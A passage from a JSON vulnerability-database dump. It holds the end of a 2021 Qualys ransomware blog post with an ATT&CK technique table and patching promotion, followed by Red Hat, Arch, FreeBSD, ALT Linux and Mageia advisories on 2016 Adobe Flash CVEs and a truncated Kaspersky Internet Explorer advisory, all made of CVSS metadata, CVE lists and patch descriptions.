(T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive & Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! \n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:37:01", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.616.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities, detailed in the Adobe Security Bulletin listed in the\nReferences section, could allow an attacker to create a specially crafted SWF\nfile that would cause flash-plugin to crash, execute arbitrary code, or disclose\nsensitive information when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\nCVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018,\nCVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\nCVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\nCVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-08T00:00:00", "type": "redhat", "title": "(RHSA-2016:0610) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2018-06-07T05:04:18", "id": "RHSA-2016:0610", "href": "https://access.redhat.com/errata/RHSA-2016:0610", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:42", "description": "- CVE-2016-1006 (JIT spraying mitigation bypass)\n\nThese updates harden a mitigation against JIT spraying attacks that\ncould be used to bypass memory layout randomization mitigations.\n\n- CVE-2016-1015 CVE-2016-1019 (arbitrary code execution)\n\nThese updates resolve type confusion vulnerabilities that could lead to\ncode execution.\n\n- CVE-2016-1011 CVE-2016-1013 CVE-2016-1016 CVE-2016-1017 CVE-2016-1031\n (arbitrary code execution)\n\nThese updates resolve use-after-free vulnerabilities that could lead to\ncode execution.\n\n- CVE-2016-1012 CVE-2016-1020 CVE-2016-1021 CVE-2016-1022 CVE-2016-1023\n CVE-2016-1024 CVE-2016-1025 CVE-2016-1026 CVE-2016-1027 CVE-2016-1028\n CVE-2016-1029 CVE-2016-1032 CVE-2016-1033 (arbitrary code execution)\n\nThese updates resolve memory corruption vulnerabilities that could lead\nto code execution.\n\n- CVE-2016-1018 (arbitrary code execution)\n\nThese updates resolve a stack overflow vulnerability that could lead to\ncode execution.\n\n- CVE-2016-1030 (sandbox restriction bypass)\n\nThese updates resolve a security bypass vulnerability.\n\n- CVE-2016-1014 (arbitrary code execution)\n\nThese updates resolve a vulnerability in the directory search path used\nto find resources that could lead to code execution.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-10T00:00:00", "type": "archlinux", "title": "flashplugin: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2016-04-10T00:00:00", "id": "ASA-201604-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-April/000599.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nAdobe reports:\n\nThese updates harden a mitigation against JIT spraying attacks that\n\t could be used to bypass memory layout randomization mitigations\n\t (CVE-2016-1006).\nThese updates resolve type confusion vulnerabilities that could\n\t lead to code execution (CVE-2016-1015, CVE-2016-1019).\nThese updates resolve use-after-free vulnerabilities that could\n\t lead to code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016,\n\t CVE-2016-1017, CVE-2016-1031).\nThese updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021,\n\t CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n\t CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n\t CVE-2016-1032, CVE-2016-1033).\nThese updates resolve a stack overflow vulnerability that could\n\t lead to code execution (CVE-2016-1018).\nThese updates resolve a security bypass vulnerability\n\t (CVE-2016-1030).\nThese updates resolve a vulnerability in the directory search path\n\t used to find resources that could lead to code execution\n\t (CVE-2016-1014).\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T00:00:00", "type": "freebsd", "title": "flash -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-07T00:00:00", "id": "07888B49-35C4-11E6-8E82-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/07888b49-35c4-11e6-8e82-002590263bf5.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "altlinux": [{"lastseen": "2022-06-10T03:06:57", "description": "3:11-alt61 built April 8, 2016 Sergey V Turchin in task [#162674](<https://git.altlinux.org/tasks/162674/>) \n--- \nApril 8, 2016 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\n CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021,\n CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt61", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-08T00:00:00", "id": "4148DE1054952F52F991A8E3D2615576", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1976109086464300213", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:24", "description": "3:11-alt61 built April 8, 2016 Sergey V Turchin in task [#162675](<https://git.altlinux.org/tasks/162675/>) \n--- \nApril 8, 2016 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\n CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021,\n CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt61", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-08T00:00:00", "id": "324457AA60645772187CEA30F961D066", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1976109086464300213", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 11.2.202.616 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update hardens a mitigation against JIT spraying attacks that could be used to bypass memory layout randomization mitigations (CVE-2016-1006). This update resolves type confusion vulnerabilities that could lead to code execution (CVE-2016-1015, CVE-2016-1019). This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031). This update resolves memory corruption vulnerabilities that could lead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033). This update resolves a stack overflow vulnerability that could lead to code execution (CVE-2016-1018). This update resolves a security bypass vulnerability (CVE-2016-1030). This update resolves a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-1014). Adobe reports that CVE-2016-1019 is already being actively exploited on Windows systems. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-08T06:17:28", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-08T06:17:28", "id": "MGASA-2016-0134", "href": "https://advisories.mageia.org/MGASA-2016-0134.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:24:06", "description": "### *Detect date*:\n07/14/2015\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to read local files, cause denial of service, bypass security restrictions, execute arbitrary code, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions from 8 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2015-2372](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2372>) \n[CVE-2015-2388](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2388>) \n[CVE-2015-2389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2389>) \n[CVE-2015-2408](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2408>) \n[CVE-2015-2425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2425>) \n[CVE-2015-2403](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2403>) \n[CVE-2015-2402](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2402>) \n[CVE-2015-2404](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2404>) \n[CVE-2015-2406](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2406>) \n[CVE-2015-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1729>) \n[CVE-2015-2412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2412>) \n[CVE-2015-2384](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2384>) \n[CVE-2015-2385](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2385>) \n[CVE-2015-2422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2422>) \n[CVE-2015-2390](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2390>) \n[CVE-2015-2391](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2391>) \n[CVE-2015-1738](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1738>) \n[CVE-2015-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1733>) \n[CVE-2015-1767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1767>) \n[CVE-2015-2383](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2383>) \n[CVE-2015-2410](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2410>) \n[CVE-2015-2413](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2413>) \n[CVE-2015-2414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2414>) \n[CVE-2015-2411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2411>) \n[CVE-2015-2397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2397>) \n[CVE-2015-2398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2398>) \n[CVE-2015-2419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2419>) \n[CVE-2015-2421](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2421>) \n[CVE-2015-2401](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2401>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2015-2372](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2372>)9.3Critical \n[CVE-2015-2388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2388>)9.3Critical \n[CVE-2015-2389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2389>)9.3Critical \n[CVE-2015-2408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2408>)9.3Critical \n[CVE-2015-2425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2425>)9.3Critical \n[CVE-2015-2403](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2403>)9.3Critical \n[CVE-2015-2402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2402>)4.3Warning \n[CVE-2015-2404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2404>)9.3Critical \n[CVE-2015-2406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2406>)9.3Critical \n[CVE-2015-1729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1729>)4.3Warning \n[CVE-2015-2412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2412>)4.3Warning \n[CVE-2015-2384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2384>)9.3Critical \n[CVE-2015-2385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2385>)9.3Critical \n[CVE-2015-2422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2422>)9.3Critical \n[CVE-2015-2390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2390>)9.3Critical \n[CVE-2015-2391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2391>)9.3Critical \n[CVE-2015-1738](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1738>)9.3Critical \n[CVE-2015-1733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1733>)9.3Critical \n[CVE-2015-1767](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1767>)9.3Critical \n[CVE-2015-2383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2383>)9.3Critical \n[CVE-2015-2410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2410>)4.3Warning \n[CVE-2015-2413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2413>)4.3Warning \n[CVE-2015-2414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2414>)4.3Warning \n[CVE-2015-2411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2411>)9.3Critical \n[CVE-2015-2397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2397>)9.3Critical \n[CVE-2015-2398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2398>)4.3Warning \n[CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>)9.3Critical \n[CVE-2015-2421](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2421>)4.3Warning \n[CVE-2015-2401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2401>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3065822](<http://support.microsoft.com/kb/3065822>) \n[3072604](<http://support.microsoft.com/kb/3072604>) \n[3076321](<http://support.microsoft.com/kb/3076321>)\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "cvss3": {}, "published": 